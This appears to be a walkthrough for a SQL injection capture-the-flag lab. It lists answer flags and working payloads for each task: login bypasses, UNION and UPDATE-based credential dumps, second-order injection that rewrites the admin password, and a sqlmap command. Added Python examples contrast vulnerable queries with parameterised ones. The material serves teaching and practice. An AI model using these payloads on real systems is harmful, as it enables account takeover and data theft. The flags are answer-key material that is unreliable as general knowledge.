SQL Injection Lab

Contents

  • SQL Injection Lab
    • Task1 Introduction
    • Task2 Introduction to SQL Injection: Part 1
    • Task3 Introduction to SQL Injection: Part 2
    • Task4 Vulnerable Startup: Broken Authentication
    • Task5 Vulnerable Startup: Broken Authentication 2
    • Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
    • Task7 Vulnerable Startup: Vulnerable Notes
    • Task8 Vulnerable Startup: Change Password
    • Task9 Vulnerable Startup: Book Title
    • Task10 Vulnerable Startup: Book Title 2

Task1 Introduction

Deploy the machine

Task2 Introduction to SQL Injection: Part 1

1. What is the flag for SQL Injection 1: Input Box Non-String?

THM{dccea429d73d4a6b4f117ac64724f460}

Numeric injection: a tautology ("universal password") bypasses the login. The resulting query is:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=1 or 1=1 -- AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'

2. What is the flag for SQL Injection 2: Input Box String?

THM{356e9de6016b9ac34e02df99a5f755ba}

String injection: a tautology bypasses the login. The resulting query is:

SELECT uid,name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or '1'='1' --' AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'

3. What is the flag for SQL Injection 3: URL Injection?

THM{645eab5d34f81981f5705de54e8a9c36}

String injection with the same tautology; the front end blocks special characters, so the request is intercepted in Burp and the encoded payload is sent. The resulting query is:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='1' or 1=1 --' AND password='6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'

4. What is the flag for SQL Injection 4: POST Injection?

THM{727334fd0f0ea1b836a8d443f09dc8eb}

String injection with the same tautology; the front end blocks special characters, so the request is intercepted in Burp and the payload is written into the POST request body. The resulting query is:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or 1=1--' AND password = '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
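Added example (not part of the original write-up): the numeric login from item 1 rebuilt against an in-memory SQLite usertable, with the concatenated query beside a parameterised one. The rows, the login_vulnerable/login_safe names and the SHA-256 hashing of passwords are assumptions for the demo.

```python
import hashlib
import sqlite3

# Constructed in-memory stand-in for the lab's usertable (column names from the
# write-up; rows are made up). Passwords are stored as SHA-256 hex, which is an
# assumption based on the 64-character hashes in the write-up's queries.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE usertable (uid INTEGER, name TEXT, profileID INTEGER, password TEXT)")
    for uid, name, pw in [(1, "alice", "123"), (2, "bob", "hunter2")]:
        con.execute("INSERT INTO usertable VALUES (?, ?, ?, ?)",
                    (uid, name, uid, hashlib.sha256(pw.encode()).hexdigest()))
    return con

def login_vulnerable(con: sqlite3.Connection, profile_id: str, password: str) -> list:
    # The raw input is pasted into the SQL text, so "1 or 1=1 --" turns the WHERE
    # clause into a tautology and comments out the password check entirely.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = f"SELECT uid, name FROM usertable WHERE profileID={profile_id} AND password='{pw_hash}'"
    return con.execute(sql).fetchall()

def login_safe(con: sqlite3.Connection, profile_id: str, password: str) -> list:
    # Bound parameters are never parsed as SQL: the whole string "1 or 1=1 --" is
    # compared with the INTEGER column as a single value, which matches no row.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = "SELECT uid, name FROM usertable WHERE profileID=? AND password=?"
    return con.execute(sql, (profile_id, pw_hash)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "1 or 1=1 --", "wrong"))  # both rows
    print("safe:      ", login_safe(db, "1 or 1=1 --", "wrong"))        # []
```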

Task3 Introduction to SQL Injection: Part 2

What is the flag for SQL Injection 5: UPDATE Statement?

First, dump the table names, which turn out to be usertable and secrets:

UPDATE usertable SET nickName='',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='',email='123',password='a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3' WHERE UID='6'

Then dump the column names, which are id, author and secret:

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='

Finally, dump the data:

',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='

Task4 Vulnerable Startup: Broken Authentication

What is the flag for this challenge?

THM{f35f47dcd9d596f0d3860d14cd4c68ec}

Authentication bypass with the tautology 1' or 1=1--

Task5 Vulnerable Startup: Broken Authentication 2

What is the flag for this challenge?

THM{fb381dfee71ef9c31b93625ad540c9fa}

After bypassing the login, the top-right corner of the page echoes a query column; the following payload dumps the flag there:

' UNION SELECT 1,group_concat(password) FROM users-- -

Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)

What is the flag for this challenge?

THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}

sqlmap -u http://IP:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite -a

Task7 Vulnerable Startup: Vulnerable Notes

What is the flag for this challenge?

THM{4644c7e157fd5498e7e4026c89650814}

Second-order injection

Register an account whose username is 'union select 1,group_concat(password) from users'

After logging in, click Notes; the application runs the statement below, which dumps every password:

SELECT title, note FROM notes WHERE username = ''union select 1,group_concat(password) from users''

Task8 Vulnerable Startup: Change Password

What is the flag for this challenge?

Second-order injection

Register a user named admin'-- -; after logging in, changing the password updates the admin account's password, because the username is spliced into the UPDATE statement:

UPDATE users SET password = ? WHERE username = 'admin' -- -'
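Added example (not part of the original write-up) covering both second-order cases, Vulnerable Notes and Change Password: registration binds the crafted username safely, and the later notes lookup and password change splice the stored value into SQL. The users/notes schema, the sample rows and the function names are assumptions; the two usernames are the ones the write-up uses.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's users and notes tables
# (schema and rows are assumptions for the demo).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    con.execute("CREATE TABLE notes (username TEXT, title TEXT, note TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'adminpass')")
    return con

def register(con: sqlite3.Connection, username: str, password: str) -> None:
    # Registration is parameterised, so any name is stored verbatim, quotes and all.
    # Validating here is not enough: every later query must bind the value as well.
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))

def notes_vulnerable(con: sqlite3.Connection, username: str) -> list:
    # Second-order sink: the stored username is spliced into the SQL text.
    return con.execute(f"SELECT title, note FROM notes WHERE username = '{username}'").fetchall()

def notes_safe(con: sqlite3.Connection, username: str) -> list:
    return con.execute("SELECT title, note FROM notes WHERE username = ?", (username,)).fetchall()

def change_password_vulnerable(con: sqlite3.Connection, username: str, new_password: str) -> int:
    # Only the password is bound; the username is concatenated, as in the lab's UPDATE.
    sql = f"UPDATE users SET password = ? WHERE username = '{username}'"
    return con.execute(sql, (new_password,)).rowcount

def change_password_safe(con: sqlite3.Connection, username: str, new_password: str) -> int:
    sql = "UPDATE users SET password = ? WHERE username = ?"
    return con.execute(sql, (new_password, username)).rowcount

def password_of(con: sqlite3.Connection, username: str) -> str:
    return con.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    register(db, "admin'-- -", "attacker")
    change_password_vulnerable(db, "admin'-- -", "pwned")
    print(password_of(db, "admin"))  # pwned: the admin row was rewritten
```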

Task9 Vulnerable Startup: Book Title

What is the flag for this challenge?

THM{27f8f7ce3c05ca8d6553bc5948a89210}

SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '-1') union select 1,2,3,group_concat(password) from users-- -%')

Task10 Vulnerable Startup: Book Title 2

What is the flag for this challenge?

THM{183526c1843c09809695a9979a672f09}
